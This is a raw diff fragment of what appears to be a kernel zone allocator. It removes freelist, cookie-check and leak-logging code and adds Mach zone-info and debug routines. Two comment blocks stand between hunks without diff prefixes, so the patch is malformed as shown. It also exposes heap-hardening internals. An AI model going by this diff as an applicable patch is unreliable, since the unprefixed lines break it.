-       }
+               memory_info = (mach_memory_info_t *) memory_info_addr;
+               vm_page_diagnose(memory_info, num_info, zones_collectable_bytes);
 
-#if CONFIG_ZLEAKS
-       /*
-        * Initialize the zone leak monitor
-        */
-       zleak_init(zone_map_size);
-#endif /* CONFIG_ZLEAKS */
+               kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE);
+               assert(kr == KERN_SUCCESS);
 
-#if VM_MAX_TAG_ZONES
-       if (zone_tagging_on) {
-               vm_allocation_zones_init();
-       }
-#endif
-}
-STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init);
+               kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr,
+                   (vm_map_size_t)memory_info_size, TRUE, &copy);
+               assert(kr == KERN_SUCCESS);
 
-__startup_func
-static void
-zone_set_foreign_range(
-       vm_offset_t range_min,
-       vm_offset_t range_max)
-{
-       zone_info.zi_foreign_range.min_address = range_min;
-       zone_info.zi_foreign_range.max_address = range_max;
-}
+               *memoryInfop = (mach_memory_info_t *) copy;
+               *memoryInfoCntp = num_info;
+       }
 
-__startup_func
-vm_offset_t
-zone_foreign_mem_init(vm_size_t size)
-{
-       vm_offset_t mem = (vm_offset_t) pmap_steal_memory(size);
-       zone_set_foreign_range(mem, mem + size);
-       return mem;
+       return KERN_SUCCESS;
 }
 
-#pragma mark zalloc
-
-#if KASAN_ZALLOC
-/*
- * Called from zfree() to add the element being freed to the KASan quarantine.
- *
- * Returns true if the newly-freed element made it into the quarantine without
- * displacing another, false otherwise. In the latter case, addrp points to the
- * address of the displaced element, which will be freed by the zone.
- */
-static bool
-kasan_quarantine_freed_element(
-       zone_t          *zonep,         /* the zone the element is being freed to */
-       void            **addrp)        /* address of the element being freed */
+kern_return_t
+mach_zone_info_for_zone(
+       host_priv_t                     host,
+       mach_zone_name_t        name,
+       mach_zone_info_t        *infop)
 {
-       zone_t zone = *zonep;
-       void *addr = *addrp;
-
-       /*
-        * Resize back to the real allocation size and hand off to the KASan
-        * quarantine. `addr` may then point to a different allocation, if the
-        * current element replaced another in the quarantine. The zone then
-        * takes ownership of the swapped out free element.
-        */
-       vm_size_t usersz = zone_elem_size(zone) - 2 * zone->kasan_redzone;
-       vm_size_t sz = usersz;
+       zone_t zone_ptr;
 
-       if (addr && zone->kasan_redzone) {
-               kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC);
-               addr = (void *)kasan_dealloc((vm_address_t)addr, &sz);
-               assert(sz == zone_elem_size(zone));
-       }
-       if (addr && !zone->kasan_noquarantine) {
-               kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true);
-               if (!addr) {
-                       return TRUE;
-               }
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-       if (addr && zone->kasan_noquarantine) {
-               kasan_unpoison(addr, zone_elem_size(zone));
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
        }
-       *addrp = addr;
-       return FALSE;
-}
-
-#endif /* KASAN_ZALLOC */
+#endif
 
-static inline bool
-zone_needs_async_refill(zone_t zone)
-{
-       if (zone->countfree != 0 || zone->async_pending || zone->no_callout) {
-               return false;
+       if (infop == NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
 
-       return zone->expandable || zone->page_count < zone->page_count_max;
-}
-
-__attribute__((noinline))
-static void
-zone_refill_synchronously_locked(
-       zone_t         zone,
-       zalloc_flags_t flags)
-{
-       thread_t thr = current_thread();
-       bool     set_expanding_vm_priv = false;
-       zone_pva_t orig = zone->pages_intermediate;
-
-       while ((flags & Z_NOWAIT) == 0 && (zone->permanent
-           ? zone_pva_is_equal(zone->pages_intermediate, orig)
-           : zone->countfree == 0)) {
+       zone_ptr = ZONE_NULL;
+       zone_foreach(z) {
                /*
-                * zone is empty, try to expand it
-                *
-                * Note that we now allow up to 2 threads (1 vm_privileged and
-                * 1 non-vm_privileged) to expand the zone concurrently...
-                *
-                * this is necessary to avoid stalling vm_privileged threads
-                * running critical code necessary to continue
-                * compressing/swapping pages (i.e. making new free pages) from
-                * stalling behind non-vm_privileged threads waiting to acquire
-                * free pages when the vm_page_free_count is below the
-                * vm_page_free_reserved limit.
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
                 */
-               if ((zone->expanding_no_vm_priv || zone->expanding_vm_priv) &&
-                   (((thr->options & TH_OPT_VMPRIV) == 0) || zone->expanding_vm_priv)) {
-                       /*
-                        * This is a non-vm_privileged thread and a non-vm_privileged or
-                        * a vm_privileged thread is already expanding the zone...
-                        *    OR
-                        * this is a vm_privileged thread and a vm_privileged thread is
-                        * already expanding the zone...
-                        *
-                        * In either case wait for a thread to finish, then try again.
-                        */
-                       zone->waiting = true;
-                       assert_wait(zone, THREAD_UNINT);
-                       unlock_zone(zone);
-                       thread_block(THREAD_CONTINUE_NULL);
-                       lock_zone(zone);
-                       continue;
-               }
-
-               if (zone->page_count >= zone->page_count_max) {
-                       if (zone->exhaustible) {
-                               break;
-                       }
-                       if (zone->expandable) {
-                               /*
-                                * If we're expandable, just don't go through this again.
-                                */
-                               zone->page_count_max = ~0u;
-                       } else {
-                               unlock_zone(zone);
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
 
-                               panic_include_zprint = true;
-#if CONFIG_ZLEAKS
-                               if (zleak_state & ZLEAK_STATE_ACTIVE) {
-                                       panic_include_ztrace = true;
-                               }
-#endif /* CONFIG_ZLEAKS */
-                               panic("zalloc: zone \"%s\" empty.", zone->z_name);
-                       }
+               /* Find the requested zone by name */
+               if (track_this_zone(temp_zone_name, name.mzn_name)) {
+                       zone_ptr = z;
+                       break;
                }
+       }
 
-               /*
-                * It is possible that a BG thread is refilling/expanding the zone
-                * and gets pre-empted during that operation. That blocks all other
-                * threads from making progress leading to a watchdog timeout. To
-                * avoid that, boost the thread priority using the rwlock boost
-                */
-               set_thread_rwlock_boost();
+       /* No zones found with the requested zone name */
+       if (zone_ptr == ZONE_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               if ((thr->options & TH_OPT_VMPRIV)) {
-                       zone->expanding_vm_priv = true;
-                       set_expanding_vm_priv = true;
-               } else {
-                       zone->expanding_no_vm_priv = true;
-               }
+       if (get_zone_info(zone_ptr, NULL, infop)) {
+               return KERN_SUCCESS;
+       }
+       return KERN_FAILURE;
+}
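/*
 * Note on the lookup above: because the comparison is made against
 * zone_heap_name(z) concatenated with z->z_name, callers must pass the
 * heap-prefixed spelling for kalloc-backed zones (for example a name of
 * the form "default.kalloc.48"; the exact prefix is illustrative), while
 * zones outside the kalloc heaps are matched by their bare z_name.
 */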
 
-               zone_replenish_locked(zone, flags, false);
+kern_return_t
+mach_zone_info_for_largest_zone(
+       host_priv_t                     host,
+       mach_zone_name_t        *namep,
+       mach_zone_info_t        *infop)
+{
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
+       }
+#endif
 
-               if (set_expanding_vm_priv == true) {
-                       zone->expanding_vm_priv = false;
-               } else {
-                       zone->expanding_no_vm_priv = false;
-               }
+       if (namep == NULL || infop == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               if (zone->waiting) {
-                       zone->waiting = false;
-                       thread_wakeup(zone);
-               }
-               clear_thread_rwlock_boost();
+       if (get_zone_info(zone_find_largest(), namep, infop)) {
+               return KERN_SUCCESS;
+       }
+       return KERN_FAILURE;
+}
+
+uint64_t
+get_zones_collectable_bytes(void)
+{
+       uint64_t zones_collectable_bytes = 0;
+       mach_zone_info_t zi;
 
-               if (zone->countfree == 0) {
-                       assert(flags & Z_NOPAGEWAIT);
-                       break;
+       zone_foreach(z) {
+               if (get_zone_info(z, NULL, &zi)) {
+                       zones_collectable_bytes +=
+                           GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable);
                }
        }
 
-       if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) &&
-           zone_needs_async_refill(zone) && !vm_pool_low()) {
-               zone->async_pending = true;
-               unlock_zone(zone);
-               thread_call_enter(&call_async_alloc);
-               lock_zone(zone);
-               assert(zone->z_self == zone);
-       }
+       return zones_collectable_bytes;
 }
 
-__attribute__((noinline))
-static void
-zone_refill_asynchronously_locked(zone_t zone)
+kern_return_t
+mach_zone_get_zlog_zones(
+       host_priv_t                             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp)
 {
-       uint32_t min_free = zone->prio_refill_count / 2;
-       uint32_t resv_free = zone->prio_refill_count / 4;
-       thread_t thr = current_thread();
+#if ZONE_ENABLE_LOGGING
+       unsigned int max_zones, logged_zones, i;
+       kern_return_t kr;
+       zone_t zone_ptr;
+       mach_zone_name_t *names;
+       vm_offset_t names_addr;
+       vm_size_t names_size;
 
-       /*
-        * Nothing to do if there are plenty of elements.
-        */
-       while (zone->countfree <= min_free) {
-               /*
-                * Wakeup the replenish thread if not running.
-                */
-               if (!zone->zone_replenishing) {
-                       lck_spin_lock(&zone_replenish_lock);
-                       assert(zone_replenish_active < zone_replenish_max_threads);
-                       ++zone_replenish_active;
-                       lck_spin_unlock(&zone_replenish_lock);
-                       zone->zone_replenishing = true;
-                       zone_replenish_wakeups_initiated++;
-                       thread_wakeup(&zone->prio_refill_count);
-               }
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
 
-               /*
-                * We'll let VM_PRIV threads continue to allocate until the
-                * reserve drops to 25%. After that only TH_OPT_ZONE_PRIV threads
-                * may continue.
-                *
-                * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish thread itself.
-                * Replenish threads *need* to use the reserve. GC threads need to
-                * get through the current allocation, but then will wait at a higher
-                * level after they've dropped any locks which would deadlock the
-                * replenish thread.
-                */
-               if ((zone->countfree > resv_free && (thr->options & TH_OPT_VMPRIV)) ||
-                   (thr->options & TH_OPT_ZONE_PRIV)) {
-                       break;
-               }
+       if (namesp == NULL || namesCntp == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               /*
-                * Wait for the replenish threads to add more elements for us to allocate from.
-                */
-               zone_replenish_throttle_count++;
-               unlock_zone(zone);
-               assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC);
-               thread_block(THREAD_CONTINUE_NULL);
-               lock_zone(zone);
+       max_zones = os_atomic_load(&num_zones, relaxed);
 
-               assert(zone->z_self == zone);
+       names_size = round_page(max_zones * sizeof *names);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
        }
+       names = (mach_zone_name_t *) names_addr;
 
-       /*
-        * If we're here because of zone_gc(), we didn't wait for
-        * zone_replenish_thread to finish.  So we need to ensure that
-        * we will successfully grab an element.
-        *
-        * This only applies to zones that have a replenish thread configured.
-        * The value of (refill_level / 2) in the previous bit of code should have
-        * given us headroom even though this thread didn't wait.
-        */
-       if (thr->options & TH_OPT_ZONE_PRIV) {
-               assert(zone->countfree != 0);
+       zone_ptr = ZONE_NULL;
+       logged_zones = 0;
+       for (i = 0; i < max_zones; i++) {
+               zone_t z = &(zone_array[i]);
+               assert(z != ZONE_NULL);
+
+               /* Copy out the zone name if zone logging is enabled */
+               if (z->zlog_btlog) {
+                       get_zone_info(z, &names[logged_zones], NULL);
+                       logged_zones++;
+               }
        }
+
+       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names);
+       *namesCntp = logged_zones;
+
+       return KERN_SUCCESS;
+
+#else /* ZONE_ENABLE_LOGGING */
+#pragma unused(host, namesp, namesCntp)
+       return KERN_FAILURE;
+#endif /* ZONE_ENABLE_LOGGING */
 }
 
-#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
-__attribute__((noinline))
-static void
-zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr)
+kern_return_t
+mach_zone_get_btlog_records(
+       host_priv_t                             host,
+       mach_zone_name_t                name,
+       zone_btrecord_array_t   *recsp,
+       mach_msg_type_number_t  *recsCntp)
 {
-       uintptr_t       zbt[MAX_ZTRACE_DEPTH];  /* used in zone leak logging and zone leak detection */
-       unsigned int    numsaved = 0;
+#if DEBUG || DEVELOPMENT
+       unsigned int numrecs = 0;
+       zone_btrecord_t *recs;
+       kern_return_t kr;
+       zone_t zone_ptr;
+       vm_offset_t recs_addr;
+       vm_size_t recs_size;
 
-#if ZONE_ENABLE_LOGGING
-       if (DO_LOGGING(zone)) {
-               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                   __builtin_frame_address(0), NULL);
-               btlog_add_entry(zone->zlog_btlog, (void *)addr,
-                   ZOP_ALLOC, (void **)zbt, numsaved);
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-#endif
 
-#if CONFIG_ZLEAKS
-       /*
-        * Zone leak detection: capture a backtrace every zleak_sample_factor
-        * allocations in this zone.
-        */
-       if (__improbable(zone->zleak_on)) {
-               if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) {
-                       /* Avoid backtracing twice if zone logging is on */
-                       if (numsaved == 0) {
-                               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                                   __builtin_frame_address(1), NULL);
-                       }
-                       /* Sampling can fail if another sample is happening at the same time in a different zone. */
-                       if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) {
-                               /* If it failed, roll back the counter so we sample the next allocation instead. */
-                               zone->zleak_capture = zleak_sample_factor;
-                       }
-               }
+       if (recsp == NULL || recsCntp == NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
 
-       if (__improbable(zone_leaks_scan_enable &&
-           !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) {
-               unsigned int count, idx;
-               /* Fill element, from tail, with backtrace in reverse order */
-               if (numsaved == 0) {
-                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                           __builtin_frame_address(1), NULL);
-               }
-               count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t));
-               if (count >= numsaved) {
-                       count = numsaved - 1;
-               }
-               for (idx = 0; idx < count; idx++) {
-                       ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1];
+       zone_ptr = ZONE_NULL;
+       zone_foreach(z) {
+               /*
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
+                */
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
+
+               /* Find the requested zone by name */
+               if (track_this_zone(temp_zone_name, name.mzn_name)) {
+                       zone_ptr = z;
+                       break;
                }
        }
-#endif /* CONFIG_ZLEAKS */
-}
 
-static inline bool
-zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size)
-{
-#if ZONE_ENABLE_LOGGING
-       if (DO_LOGGING(zone)) {
-               return true;
+       /* No zones found with the requested zone name */
+       if (zone_ptr == ZONE_NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
-#endif
-#if CONFIG_ZLEAKS
-       /*
-        * Zone leak detection: capture a backtrace every zleak_sample_factor
-        * allocations in this zone.
-        */
-       if (zone->zleak_on) {
-               return true;
+
+       /* Logging not turned on for the requested zone */
+       if (!DO_LOGGING(zone_ptr)) {
+               return KERN_FAILURE;
        }
-       if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) {
-               return true;
+
+       /* Allocate memory for btlog records */
+       numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog));
+       recs_size = round_page(numrecs * sizeof *recs);
+
+       kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
        }
-#endif /* CONFIG_ZLEAKS */
-       return false;
-}
-#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
-#if ZONE_ENABLE_LOGGING
 
-__attribute__((noinline))
-static void
-zfree_log_trace(zone_t zone, vm_offset_t addr)
-{
        /*
-        * See if we're doing logging on this zone.
-        *
-        * There are two styles of logging used depending on
-        * whether we're trying to catch a leak or corruption.
+        * We will call get_btlog_records() below which populates this region while holding a spinlock
+        * (the btlog lock). So these pages need to be wired.
         */
-       if (__improbable(DO_LOGGING(zone))) {
-               if (corruption_debug_flag) {
-                       uintptr_t       zbt[MAX_ZTRACE_DEPTH];
-                       unsigned int    numsaved;
-                       /*
-                        * We're logging to catch a corruption.
-                        *
-                        * Add a record of this zfree operation to log.
-                        */
-                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                           __builtin_frame_address(1), NULL);
-                       btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE,
-                           (void **)zbt, numsaved);
-               } else {
-                       /*
-                        * We're logging to catch a leak.
-                        *
-                        * Remove any record we might have for this element
-                        * since it's being freed.  Note that we may not find it
-                        * if the buffer overflowed and that's OK.
-                        *
-                        * Since the log is of a limited size, old records get
-                        * overwritten if there are more zallocs than zfrees.
-                        */
-                       btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr);
-               }
-       }
-}
-#endif /* ZONE_ENABLE_LOGGING */
+       kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size,
+           VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
+       assert(kr == KERN_SUCCESS);
 
-/*
- * Removes an element from the zone's free list, returning 0 if the free list is empty.
- * Verifies that the next-pointer and backup next-pointer are intact,
- * and verifies that a poisoned element hasn't been modified.
- */
-vm_offset_t
-zalloc_direct_locked(
-       zone_t              zone,
-       zalloc_flags_t      flags __unused,
-       vm_size_t           waste __unused)
-{
-       struct zone_page_metadata *page_meta;
-       zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
-       vm_offset_t element, page, validate_bit = 0;
-
-       /* if zone is empty, bail */
-       if (!zone_pva_is_null(zone->pages_any_free_foreign)) {
-               kind = ZONE_ADDR_FOREIGN;
-               page_meta = zone_pva_to_meta(zone->pages_any_free_foreign, kind);
-               page = (vm_offset_t)page_meta;
-       } else if (!zone_pva_is_null(zone->pages_intermediate)) {
-               page_meta = zone_pva_to_meta(zone->pages_intermediate, kind);
-               page = zone_pva_to_addr(zone->pages_intermediate);
-       } else if (!zone_pva_is_null(zone->pages_all_free)) {
-               page_meta = zone_pva_to_meta(zone->pages_all_free, kind);
-               page = zone_pva_to_addr(zone->pages_all_free);
-               if (os_sub_overflow(zone->allfree_page_count,
-                   page_meta->zm_page_count, &zone->allfree_page_count)) {
-                       zone_accounting_panic(zone, "allfree_page_count wrap-around");
-               }
-       } else {
-               zone_accounting_panic(zone, "countfree corruption");
-       }
+       recs = (zone_btrecord_t *)recs_addr;
+       get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs);
 
-       if (!zone_has_index(zone, page_meta->zm_index)) {
-               zone_page_metadata_index_confusion_panic(zone, page, page_meta);
-       }
+       kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE);
+       assert(kr == KERN_SUCCESS);
 
-       element = zone_page_meta_get_freelist(zone, page_meta, page);
+       *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs);
+       *recsCntp = numrecs;
 
-       vm_offset_t *primary = (vm_offset_t *) element;
-       vm_offset_t *backup  = get_backup_ptr(zone_elem_size(zone), primary);
+       return KERN_SUCCESS;
 
-       /*
-        * since the primary next pointer is xor'ed with zp_nopoison_cookie
-        * for obfuscation, retrieve the original value back
-        */
-       vm_offset_t  next_element          = *primary ^ zp_nopoison_cookie;
-       vm_offset_t  next_element_primary  = *primary;
-       vm_offset_t  next_element_backup   = *backup;
+#else /* DEBUG || DEVELOPMENT */
+#pragma unused(host, name, recsp, recsCntp)
+       return KERN_FAILURE;
+#endif /* DEBUG || DEVELOPMENT */
+}
+
+
+#if DEBUG || DEVELOPMENT
+
+kern_return_t
+mach_memory_info_check(void)
+{
+       mach_memory_info_t * memory_info;
+       mach_memory_info_t * info;
+       unsigned int         num_info;
+       vm_offset_t          memory_info_addr;
+       kern_return_t        kr;
+       size_t               memory_info_size, memory_info_vmsize;
+       uint64_t             top_wired, zonestotal, total;
 
-       /*
-        * backup_ptr_mismatch_panic will determine what next_element
-        * should have been, and print it appropriately
-        */
-       if (!zone_page_meta_is_sane_element(zone, page_meta, page, next_element, kind)) {
-               backup_ptr_mismatch_panic(zone, page_meta, page, element);
-       }
+       num_info = vm_page_diagnose_estimate();
+       memory_info_size = num_info * sizeof(*memory_info);
+       memory_info_vmsize = round_page(memory_info_size);
+       kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG);
+       assert(kr == KERN_SUCCESS);
 
-       /* Check the backup pointer for the regular cookie */
-       if (__improbable(next_element_primary != next_element_backup)) {
-               /* Check for the poisoned cookie instead */
-               if (__improbable(next_element != (next_element_backup ^ zp_poisoned_cookie))) {
-                       /* Neither cookie is valid, corruption has occurred */
-                       backup_ptr_mismatch_panic(zone, page_meta, page, element);
-               }
+       memory_info = (mach_memory_info_t *) memory_info_addr;
+       vm_page_diagnose(memory_info, num_info, 0);
 
-               /*
-                * Element was marked as poisoned, so check its integrity before using it.
-                */
-               validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       } else if (zone->zfree_clear_mem) {
-               validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION;
+       top_wired = total = zonestotal = 0;
+       zone_foreach(z) {
+               zonestotal += zone_size_wired(z);
        }
 
-       /* Remove this element from the free list */
-       zone_page_meta_set_freelist(page_meta, page, next_element);
-
-       if (kind == ZONE_ADDR_FOREIGN) {
-               if (next_element == 0) {
-                       /* last foreign element allocated on page, move to all_used_foreign */
-                       zone_meta_requeue(zone, &zone->pages_all_used_foreign, page_meta, kind);
+       for (uint32_t idx = 0; idx < num_info; idx++) {
+               info = &memory_info[idx];
+               if (!info->size) {
+                       continue;
+               }
+               if (VM_KERN_COUNT_WIRED == info->site) {
+                       top_wired = info->size;
+               }
+               if (VM_KERN_SITE_HIDE & info->flags) {
+                       continue;
+               }
+               if (!(VM_KERN_SITE_WIRED & info->flags)) {
+                       continue;
                }
-       } else if (next_element == 0) {
-               zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind);
-       } else if (page_meta->zm_alloc_count == 0) {
-               /* remove from free, move to intermediate */
-               zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind);
+               total += info->size;
        }
+       total += zonestotal;
 
-       if (os_add_overflow(page_meta->zm_alloc_count, 1,
-           &page_meta->zm_alloc_count)) {
-               /*
-                * This will not catch a lot of errors, the proper check
-                * would be against the number of elements this run should
-                * have which is expensive to count.
-                *
-                * But zm_alloc_count is a 16 bit number which could
-                * theoretically be valuable to cause to wrap around,
-                * so catch this.
-                */
-               zone_page_meta_accounting_panic(zone, page_meta,
-                   "zm_alloc_count overflow");
-       }
-       if (os_sub_overflow(zone->countfree, 1, &zone->countfree)) {
-               zone_accounting_panic(zone, "countfree wrap-around");
-       }
+       printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n",
+           total, top_wired, zonestotal, top_wired - total);
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = zalloc_flags_get_tag(flags);
-               // set the tag with b0 clear so the block remains inuse
-               ZTAG(zone, element)[0] = (vm_tag_t)(tag << 1);
-               vm_tag_update_zone_size(tag, zone->tag_zone_index,
-                   zone_elem_size(zone), waste);
-       }
-#endif /* VM_MAX_TAG_ZONES */
-#if KASAN_ZALLOC
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       kasan_poison_range(element + ptoa(i),
-                           zone_elem_size(zone), ASAN_VALID);
-               }
-       } else {
-               kasan_poison_range(element, zone_elem_size(zone), ASAN_VALID);
-       }
-#endif
+       kmem_free(kernel_map, memory_info_addr, memory_info_vmsize);
 
-       return element | validate_bit;
+       return kr;
 }
 
-/*
- *     zalloc returns an element from the specified zone.
- *
- *     The function is noinline when zlog can be used so that the backtracing can
- *     reliably skip the zalloc_ext() and zalloc_log_or_trace_leaks()
- *     boring frames.
- */
-#if ZONE_ENABLE_LOGGING
-__attribute__((noinline))
-#endif
-void *
-zalloc_ext(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       zalloc_flags_t  flags,
-       vm_size_t       waste)
-{
-       vm_offset_t     addr = 0;
-       vm_size_t       elem_size = zone_elem_size(zone);
-
-       /*
-        * KASan uses zalloc() for fakestack, which can be called anywhere.
-        * However, we make sure these calls can never block.
-        */
-       assert(zone->kasan_fakestacks ||
-           ml_get_interrupts_enabled() ||
-           ml_is_quiescing() ||
-           debug_mode_active() ||
-           startup_phase < STARTUP_SUB_EARLY_BOOT);
+extern boolean_t(*volatile consider_buffer_cache_collect)(int);
 
-       /*
-        * Make sure Z_NOFAIL was not obviously misused
-        */
-       if ((flags & Z_NOFAIL) && !zone->prio_refill_count) {
-               assert(!zone->exhaustible && (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
-       }
+#endif /* DEBUG || DEVELOPMENT */
 
-#if CONFIG_ZCACHE
-       /*
-        * Note: if zone caching is on, gzalloc and tags aren't used
-        *       so we can always check this first
-        */
-       if (zone_caching_enabled(zone)) {
-               addr = zcache_alloc_from_cpu_cache(zone, zstats, waste);
-               if (__probable(addr)) {
-                       goto allocated_from_cache;
-               }
+kern_return_t
+mach_zone_force_gc(
+       host_t host)
+{
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-#endif /* CONFIG_ZCACHE */
 
-#if CONFIG_GZALLOC
-       if (__improbable(zone->gzalloc_tracked)) {
-               addr = gzalloc_alloc(zone, zstats, flags);
-               goto allocated_from_gzalloc;
-       }
-#endif /* CONFIG_GZALLOC */
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               vm_tag_t tag = zalloc_flags_get_tag(flags);
-               if (tag == VM_KERN_MEMORY_NONE) {
-                       /*
-                        * zone views into heaps can lead to a site-less call
-                        * and we fallback to KALLOC as a tag for those.
-                        */
-                       tag = VM_KERN_MEMORY_KALLOC;
-                       flags |= Z_VM_TAG(tag);
-               }
-               vm_tag_will_update_zone(tag, zone->tag_zone_index);
+#if DEBUG || DEVELOPMENT
+       /* Callout to buffer cache GC to drop elements in the apfs zones */
+       if (consider_buffer_cache_collect != NULL) {
+               (void)(*consider_buffer_cache_collect)(0);
        }
-#endif /* VM_MAX_TAG_ZONES */
-
-       lock_zone(zone);
-       assert(zone->z_self == zone);
+       zone_gc(ZONE_GC_DRAIN);
+#endif /* DEBUG || DEVELOPMENT */
+       return KERN_SUCCESS;
+}
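/*
 * Illustrative usage (caller hypothetical): a memory test on a
 * DEBUG/DEVELOPMENT kernel can call
 * mach_zone_force_gc(mach_host_self()) before sampling so that
 * collectable zone pages have been drained; on kernels built without
 * DEBUG || DEVELOPMENT the routine still returns KERN_SUCCESS but
 * performs no drain.
 */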
 
-       /*
-        * Check if we need another thread to replenish the zone or
-        * if we have to wait for a replenish thread to finish.
-        * This is used for elements, like vm_map_entry, which are
-        * needed themselves to implement zalloc().
-        */
-       if (__improbable(zone->prio_refill_count &&
-           zone->countfree <= zone->prio_refill_count / 2)) {
-               zone_refill_asynchronously_locked(zone);
-       } else if (__improbable(zone->countfree == 0)) {
-               zone_refill_synchronously_locked(zone, flags);
-               if (__improbable(zone->countfree == 0)) {
-                       unlock_zone(zone);
-                       if (__improbable(flags & Z_NOFAIL)) {
-                               zone_nofail_panic(zone);
-                       }
-                       goto out_nomem;
-               }
-       }
+zone_t
+zone_find_largest(void)
+{
+       uint32_t    largest_idx  = 0;
+       vm_offset_t largest_size = zone_size_wired(&zone_array[0]);
 
-       addr = zalloc_direct_locked(zone, flags, waste);
-       if (__probable(zstats != NULL)) {
-               /*
-                * The few vm zones used before zone_init() runs do not have
-                * per-cpu stats yet
-                */
-               int cpu = cpu_number();
-               zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size;
-#if ZALLOC_DETAILED_STATS
-               if (waste) {
-                       zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste;
+       zone_index_foreach(i) {
+               vm_offset_t size = zone_size_wired(&zone_array[i]);
+               if (size > largest_size) {
+                       largest_idx = i;
+                       largest_size = size;
                }
-#endif /* ZALLOC_DETAILED_STATS */
        }
 
-       unlock_zone(zone);
-
-#if ZALLOC_ENABLE_POISONING
-       bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-#endif
-       addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       zone_clear_freelist_pointers(zone, addr);
-#if ZALLOC_ENABLE_POISONING
-       /*
-        * Note: percpu zones do not respect ZONE_MIN_ELEM_SIZE,
-        *       so we will check the first word even if we just
-        *       cleared it.
-        */
-       zalloc_validate_element(zone, addr, elem_size - sizeof(vm_offset_t),
-           validate);
-#endif /* ZALLOC_ENABLE_POISONING */
+       return &zone_array[largest_idx];
+}
 
-allocated_from_cache:
-#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
-       if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) {
-               zalloc_log_or_trace_leaks(zone, addr);
-       }
-#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
